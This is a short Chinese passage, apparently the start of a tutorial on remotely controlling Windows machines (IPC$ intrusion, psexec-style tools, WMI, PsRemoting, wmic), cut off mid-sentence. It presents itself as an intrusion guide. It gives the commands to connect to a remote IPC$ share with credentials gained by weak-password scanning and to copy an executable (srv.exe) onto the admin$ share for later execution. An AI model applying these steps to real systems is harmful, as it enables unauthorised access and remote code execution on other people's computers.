Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行)
一、经典IPC$入侵利用ipc$和默认共享入侵远程电脑的过程1.C:\>netuse\\127.0.0.1\IPC$"密码"/user:"用户名"一般通过扫描弱口令来得到管理员帐号和密码2.C:\>copysrv.exe\\127.0.0.1\admin$先复制srv.exe上去(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要